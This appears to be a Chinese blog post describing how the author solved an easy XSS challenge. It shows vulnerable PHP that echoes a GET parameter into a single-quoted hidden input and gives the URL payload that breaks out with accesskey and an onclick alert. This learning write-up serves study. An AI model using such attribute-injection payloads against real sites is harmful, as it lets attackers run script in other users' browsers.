XSS 练习题记录
来源:互联网 发布:agins算法 编辑:程序博客网 时间:2024/06/02 07:31
今天看到网上有个XSS挑战赛的,我就去参加了,当做学习。
先记录一下解题过程
找了一体解题人数最多的,也就是最简单的题目。
源码
<?phpheader('X-XSS-Protection:0');header('Content-Type:text/html;charset=utf-8');?><head><meta http-equiv="x-ua-compatible" content="IE=10"></head><body><form action=''><input type='hidden' name='token' value='<?php echo htmlspecialchars($_GET['token']); ?>'><input type='submit'></body>
之前做过类似的htmlspecialchars会让获取的js不执行,但是遇到单引号就GG了
还有这个type='hidden'是一个隐藏页面。得=想办法激活。
网上查询发现可以设置快捷键
于是构造URL http://xxxxx/xss14.php?token=%27%20accesskey=X%20onclick=alert%28/xss/%29%20%27
成功过关
阅读全文
0 0
- XSS 练习题记录
- 练习题记录
- XSS挑战赛记录
- XSS初学记录
- 记录-数据结构第一章上机练习题
- 【学习记录】练习题-二分查找
- XSS挑战之旅 解题记录
- XSS
- xss
- xss
- xss
- xss
- xss
- xss
- XSS
- XSS
- XSS
- xss
- 你遇到的设计模式有哪些???
- Easyui tree 从数据库中动态加载数据(2)
- 小圆点
- socket通信简单实现。
- Ubuntu 15 安装Sublime Text 3
- XSS 练习题记录
- MFC对话框颜色设置
- 中断
- ArrayList的实现原理---collections子集的原理整理(一)
- Android设计模式之(12)----备忘录模式
- ffmpeg过滤器文件结构
- Java生成名片式的二维码源码分享
- 14个最常见的Kafka面试题及答案
- Quartz基础篇(二)之CronTrigger触发器